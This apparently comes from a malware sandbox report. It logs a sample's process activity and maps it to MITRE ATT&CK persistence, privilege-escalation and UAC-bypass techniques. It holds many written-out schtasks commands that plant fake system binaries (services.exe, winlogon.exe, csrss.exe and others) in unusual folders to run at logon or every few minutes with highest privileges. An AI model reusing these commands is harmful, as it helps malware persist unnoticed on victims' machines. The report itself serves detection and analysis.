C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Public\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\NetHood\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\NetHood\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1716
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD5a41f32a91dbcdbce4c228699132b93c9
SHA1d0bd341cffc773cb21f11867dda877229184e183
SHA25635c3938824834811cd233f1ea6984bb924073e3ea764dfacd7470fd9ba0deedf
SHA51201d37451651c142fd97895a58e692ca2c730d3bc7bc81fd32e6c0d5ba9f00742f9383d5ca6694e645a99d8e95502db5f783ed3c83b4a334663c287648b9d44b9
-
Filesize
223B
MD5fc1767123a892d7ae259539f02430ce7
SHA1e58886076b05bce72d410a934740be6b7807f8b4
SHA256944e62bc33948ada15bf3eff5d83e9ee51f8829097dcf620cb124aa2fd8c86fd
SHA5128259a18c6f6440f09676545242b2d486064ceca6ca1ad9f2c5883e8c09cdeae3f2c2a35a34de01e9670447ec4e4158a13b18ef02391ec3115f4e6a499949a607
-
Filesize
2.7MB
MD58cdae0ef9f7f5ab79ec5671644e1a0f0
SHA1dfae9279327bb5658e9d95daae768bfaf4dca42f
SHA256e4c8b1c4527c76289bb4247f0a02d3dd85545bdc59530f005941455d05826aed
SHA512828146a24cc9ddac7e6e4f80df37356cbaf1bf93be1540b9cc3c5e49c7a46ef49f74ef48ba23998b5c388575aa792cc3f43043aadb15ff5b21eff841f49171f6